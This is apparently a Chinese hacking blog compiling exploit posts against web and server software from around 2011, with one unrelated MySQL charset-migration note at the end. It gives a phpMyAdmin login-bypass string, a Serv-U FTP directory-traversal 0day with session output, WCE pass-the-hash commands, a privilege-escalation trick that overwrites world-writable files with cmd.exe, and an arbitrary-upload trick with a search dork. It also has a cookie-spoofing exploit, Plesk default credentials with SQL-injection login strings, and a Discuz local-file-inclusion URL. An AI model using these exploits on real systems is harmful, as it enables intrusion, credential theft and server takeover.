misssky'sblog

PHPmyadmin 2.11.3+2.11.4万能密码

admin — Wed, 18 Apr 2012 04:45:11 +0000

PHPmyadmin 2.11.3 2.11.4

两个版本都有此漏洞

经测试确实可以用。。。

只需要输入账号密码不需要输入

利用代码如下：
‘localhost’@’@”

aspx连接mysql数据库

admin — Mon, 09 Apr 2012 10:14:22 +0000

mysql今天提权中用到的收藏下！

Serv-U目录跳转

admin — Sat, 10 Dec 2011 13:56:34 +0000

I m better than TESO!

CONFIDENTIAL SOURCE MATERIALS!

[*]----------------------------------------------------[*]

   Serv-U FTP Server Jail Break 0day

   Discovered By Kingcope

   Year 2011

[*]----------------------------------------------------[*]

Affected:

220 Serv-U FTP Server v7.3 ready...

220 Serv-U FTP Server v7.1 ready...

220 Serv-U FTP Server v6.4 ready...

220 Serv-U FTP Server v8.2 ready...

220 Serv-U FTP Server v10.5 ready...

[*]----------------------------------------------------[*]

C:\Users\kingcope\Desktop>ftp 192.168.133.134

Verbindung mit 192.168.133.134 wurde hergestellt.

220 Serv-U FTP Server v6.4 for WinSock ready...

Benutzer (192.168.133.134:(none)): ftp (anonymous user :>)

331 User name okay, please send complete E-mail address as password.

Kennwort:

230 User logged in, proceed.

ftp> cd "/..:/..:/..:/..:/program files"

250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files

ftp> ls -la

200 PORT Command successful.

150 Opening ASCII mode data connection for /bin/ls.

dr--r--r-- 1 user group 0 Nov 12 21:48 .

dr--r--r-- 1 user group 0 Nov 12 21:48 ..

drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundatio

n

drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications

drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files

drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer

drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources

d--------- 1 user group 0 Jul 8 16:12 InstallShield

Installation Information

drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer

drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch

drw-rw-rw- 1 user group 0 Feb 12 2011 Java

drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting

drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express

drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL

drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com

drw-rw-rw- 1 user group 0 Feb 12 2011 Sun

d--------- 1 user group 0 Jul 29 15:13 Uninstall Information

drw-rw-rw- 1 user group 0 Feb 5 2011 VMware

drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR

drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player

drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT

d--------- 1 user group 0 Feb 5 2011 WindowsUpdate

226 Transfer complete.

FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s

ftp>

[*]----------------------------------------------------[*]

with write perms:

ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition

[*]----------------------------------------------------[*]

and as anonymous ftp:

ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes

200 PORT Command successful.

150 Opening ASCII mode data connection for calc.exe (115712 Bytes).

226 Transfer complete.

FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s

[*]----------------------------------------------------[*]

This works to!!! :

220 Serv-U FTP Server v7.3 ready...

Benutzer (xx.xx.xx.xx:(none)): ftp

331 User name okay, please send complete E-mail address as password.

Kennwort:

230 User logged in, proceed.

ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"

200 PORT Command successful.

150 Opening ASCII mode data connection for /bin/ls.

.

..

AUTOEXEC.BAT

boot.ini

bootfont.bin

bsmain_runtime.log

CONFIG.SYS

Documents and Settings

FPSE_search

Inetpub

IO.SYS

log

MSDOS.SYS

msizap.exe

MSOCache

mysql

NTDETECT.COM

ntldr

Program Files

RavBin

RECYCLER

Replay.log

rising.ini

System Volume Information

TDDOWNLOAD

WCH.CN

WINDOWS

wmpub

226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.

FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s

[*]----------------------------------------------------[*]

Sometimes you need to give it the path:

ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"

ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"

200 PORT Command successful.

150 Opening ASCII mode data connection for /bin/ls.

.

..

360

Adobe

ASP.NET

CCProxy

CE Remote Tools

cmak

Common Files

ComPlus Applications

D-Tools

FFTPServer

HTML Help Workshop

IISServer

InstallShield Installation Information

Intel

Internet Explorer

Java

JavaSoft

K-Lite Codec Pack

Microsoft ActiveSync

Microsoft Analysis Services

Microsoft Device Emulator

Microsoft MapPoint Web Service Samples

Microsoft MapPoint Web Service SDK, Version 4.0

Microsoft Office

Microsoft Office Servers

Microsoft Silverlight

Microsoft SQL Server

Microsoft Visual SourceSafe

Microsoft Visual Studio 8

Microsoft.NET

MSBuild

MSXML 6.0

NetMeeting

Outlook Express

PortMap1.61

Reference Assemblies

Rising

SQLXML 4.0

SQLyog Enterprise

STS2Setup_2052

Symantec

Thunder Network

TSingVision

Uninstall Information

Windows Media Player

Windows NT

WindowsUpdate

WinRAR

226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.

FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s

ftp>

滲透利器wce

admin — Fri, 09 Dec 2011 17:21:02 +0000

转自hack520′s Blog
可以抓到當前登陸在上面的域用戶HASH，xp~2008 都可以~X64 沒測試~上3389時請用console上才可正常運行~

wce.exe -l 列出當前域用戶HASH，如果你是普通YU用戶~而超級DOMAIN ADMIN又ONLINE時~
得到他HASH 之後~

wce.exe -s pig:Domainname:00000000000000000000000000000000:4A59CF37F6A2307D14ABA1921E8BBFE6 //例如pig是DOMAIN ADMIN

就可以把此豬的HASH，繼承到你當前DOMAIN USER 上，你就是pig.你無敵~

星外提权新思路&星外安全公告(提权漏洞)

admin — Tue, 21 Jun 2011 13:26:24 +0000

声明，这不是什么星外0DAY，这充其量只是一个在找不到可写可执行目录的一个提权思路。我不敢说是我最先发现的，可能有其他人也发现了，并且也在利用了。
其实无数实例证明了lcx前辈那句话，细节决定成败。这只是入侵渗透中的细节问题，刚好我注意到了。下面正文开始。

众所周知要成功提权星外主机就要找到可写可执行目录，可近来星外主机的目录设置越来越BT，几乎没有可写可执行目录。所以另一个“提权思路”出现了。寻找服务器上安装的第3方软件某些文件的权限问题来进行文件替换，将这些文件替换为我们的cmd.exe和cscript.exe来提权，经我测试发现以下服务器常用软件的某些文件权限为Everyone即为所有用户权限，可以修改，可以上传同文件名替换，删除，最重要的是还可以执行。

首先是我们可爱的360杀毒。

c:\Program Files\360\360Safe\AntiSection\mutex.db 360杀毒数据库文件
c:\Program Files\360\360Safe\deepscan\Section\mutex.db 360杀毒数据库文件
c:\Program Files\360\360sd\Section\mutex.db 360杀毒数据库文件

c:\Program Files\360\360Safe\deepscan\Section\mutex.db这个文件，只要安装了360杀毒就一定存在，并且有Everyone权限。其他2个文件不一定。

c:\Program Files\Helicon\ISAPI_Rewrite3\error.log 伪静态设置软件ISAPI Rewrite日志文件
c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log 伪静态设置软件ISAPI Rewrite日志文件
c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf 伪静态设置软件ISAPI Rewrite配置文件

主要是ISAPI Rewrite 3.0版本存在权限问题，老版本暂时没发现有此类问题。

c:\Program Files\Common Files\Symantec Shared\Persist.bak 诺顿杀毒事件日志文件

c:\Program Files\Common Files\Symantec Shared\Validate.dat 诺顿杀毒事件日志文件

c:\Program Files\Common Files\Symantec Shared\Persist.Dat 诺顿杀毒事件日志文件

诺顿杀毒可能局限于版本，我本机XP并未找到以上文件

以下是最后2个可替换文件
c:\windows\hchiblis.ibl 华盾服务器管理专家文件许可证

c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

DU Meter的流量统计信息日志文件

暂时知道以上文件权限为Everyone，注意，即使可替换文件的所在目录你无权访问，也照样可以替换执行。比如D:\Program Files\360\360Safe\deepscan\Section\mutex.db，可D:\Program Files\360\360Safe\deepscan\Section目录没有访问权限，用BIN牛的aspx大马访问D:\Program Files\360\360Safe\deepscan\Sectio显示拒绝访问，可mutex.db文件在该目录下，你照样可以上传由cmd.exe换名后的mutex.db文件进行替换。

这样一来在没有找到可写可执行目录时候，不防查看服务器上是否安装了以上软件，有的话可以上传同文件名替换原文件为你的提权文件。这样就可以成功执行了。

===========================================================================

目录或文件的权限设置有错会造成入侵!
为了从根本上解决问题,我们建议所有用户升级受控端安装包到2011-3-15版,并点击设置”ASP.net严格安全模型”,以下所说的问题所有设置了asp.net严格安全的用户不受影响.

对于服务器上的杀毒软件,我们建议装Mcafee,请不重装360,很多版本的360都有提权问题.

在2011-6-8星外发布了新版的星外杀马扫描工具(在群共享或星外后台可以下载)

在扫描结果中我们发现在大量服务器存在以下问题.

文件:C:\WINDOWS\TAPI\tsec.ini
处理办法:直接完全删除这个文件(不要保留在回收站)

360的
文件:C:\Program Files\360\360sd\Section\mutex.db
文件:C:\Program Files\360\360Safe\deepscan\Section\mutex.db
文件:C:\Program Files\360\360Safe\AntiSection\mutex.db
处理办法:直接完全删除360,所有360删除光后留下的文件都要删除

Flash:
文件:C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx
处理办法:直接完全删除(不要保留在回收站),不要在服务器上装Flash组件

IISrewrite3
文件:C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log
文件:C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf
文件:C:\Program Files\Helicon\ISAPI_Rewrite3\error.log
处理办法:将三个文件的权限改成erveryone只读权限(没有写的权限)

DU Meter的流量统计信息日志文件
c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv
处理办法:删除它

诺顿
c:\Program Files\Common Files\Symantec Shared\Persist.bak
c:\Program Files\Common Files\Symantec Shared\Validate.dat
c:\Program Files\Common Files\Symantec Shared\Persist.Dat
处理办法:直接完全删除这个软件

华盾
文件:C:\WINDOWS\hchiblis.ibl
处理办法:直接完全删除这个过滤软件,如果因为别的原因不能删除,可以将权限改成everyone读与写,不能有everyone运行的权限.

一流过滤:
文件:C:\7i24.com\iissafe\log\startandiischeck.txt
文件:C:\7i24.com\iissafe\log\scanlog.htm
如果已经是最新版本的一流(2011-2-19)就不需要处理,如果是旧版本的,要先删除这两个文件,然后再升级一流.正常情况下,这两个文件只有everyone读写的权限(没有运行)

其他有可能提示的文件:
文件:C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\index.dat
文件:C:\WINDOWS\Temp\History\History.IE5\index.dat
文件:C:\WINDOWS\Temp\Cookies\index.dat
检查文件在高级权限管理中,是不是有everyone运行的权限,如果没有,就不用处理,如果有运行的权限要取消运行权限

文件:C:\7i24.com\LinkGate\log\….
目录:C:\7i24.com\LinkGate\log
目录:C:\7i24.com\serverdoctor\log\
文件:C:\7i24.com\serverdoctor\log\….
不需要处理,星外的防盗链,服务器医生等软件默认已自动设置好权限

如果看下这样的提示:
2011-6-8 15:04:50,方法失败，意外错误代码为 32。
这是扫描软盘A:造成的,不用处理

部分zend版本可能有这个提示:
文件:C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll
目录:C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x……
处理办法:将everyone的权限删除,改成adms,system全部权限,users只读权限.

处理后,请再用星外杀马扫描一次.

杰奇小说连载系统任意文件上传0day

admin — Fri, 17 Jun 2011 09:15:00 +0000

注册用户
进入空间-相册-上传
用oprea活firefox修改源码
有个*.jpg *.gif的地方改成*。*就能上传任意文件

关键字：inurl:modules/space

我也不知道谁的版权勿喷

js 本地验证上传类型很少遇到php 有这样的漏洞作为一个经典的案例吧

正版逍遥网店系统 V3.0 COOKIE欺骗漏洞

admin — Tue, 01 Mar 2011 06:07:00 +0000

正版逍遥网店系统 V3.0
BY：风之传说
刚才我挖了一个洞，然后我一个朋友刚好又叫我帮他看源码郁闷又发现了一个~！这人品是咋滴。。
当然还很感谢心灵大牛的指导哈哈~！
OK开始，这是一个网店，本来我想先找注入，貌似注入都过滤了。于是我又来到后台，看了下检测文件，悲剧由此产生：
漏洞文件：checkadmin.asp

大家看到这里一定以为很简单吧，呵呵直接COOKIE欺骗就可以进后台，如果真的这样我就不发了~！留个悬念让大家去试试。
然后我进入后台，http://127.0.0.1/admin/index.asp.自动跟我弹了回来。我当时就郁闷了。继续看代码。
index.asp

看到这里我奇怪了，是调用checkadmin.asp啊为什么进不了后台。我看到了main.asp。
继续跟进。代码就不发了免得多，最后发现了一个文件。
漏洞文件：include\buyok_functions.asp
下面贴出部分代码：

set rscheck=conn.execute("select * from buyok_user where UserId='"&request.cookies("buyok")("userid")&"'")
if rscheck.eof and rscheck.bof then
response.write ""
response.end

看到这里大家都懂了吧呵呵~！
OK附上EXP：
KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; buyok=userid=1&temp=login&admin=admin;
修改COOKIE 然后直接进入http://l127.0.0.1/admin/index.asp.
后台：http://localhost/admin/login.asp

plesk panel 虚拟主机管理平台 0day

admin — Tue, 01 Mar 2011 05:43:08 +0000

其实这个漏洞，一年前一个朋友就告诉我了，一直也没怎么玩这个，具体利用我也没怎么太多去试。好象有点点麻烦，看到别人都已经放出来了，我也丢出来吧。大家去试吧，

1,在http://xxxxxx.com:8880这里，默认的管理员账户密码是admin 密码stepu

2，在https://xxxxx.com:8443

mssql版本

账号 ‘ union select top 1 login+char(124)+passwd from admin_aliases–

报错,爆出账号密码

登陆后server–>remote desktop账号密码一样
拿到服务器权限

mysql版本
‘union select ‘-1 union select 1,1,1#’# 密码填 1

DISCUZ X1.5 本地文件包含漏洞

admin — Tue, 01 Mar 2011 05:40:19 +0000

DISCUZX1.5 本地文件包含，当然是有条件的，就是使用文件作为缓存。

config_global.php
$_config['cache']['type'] = ‘file’;

地址：

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

function cachedata($cachenames) {
……
$isfilecache = getglobal(‘config/cache/type’) == ‘file’;
……
if($isfilecache) {
$lostcaches = array();
foreach($cachenames as $cachename) {
if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
$lostcaches[] = $cachename;
}
}

……
}

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

执行了 api/uc.php 页面代码了。

mysql移植之将latin1编码更换为utf-8编码

admin — Tue, 22 Feb 2011 10:11:22 +0000

1、备份数据库

mysqldump –default-character-set=latin1 –create-options=false –set-charset=false -u root -p 数据库名称

>E:\back.sql

2、创建新数据库

CREATE DATABASE 数据库名称 CHARACTER SET utf8 COLLATE utf8_general_ci;

3、导入数据

mysql -u root -p –default-character-set=gbk 数据库名称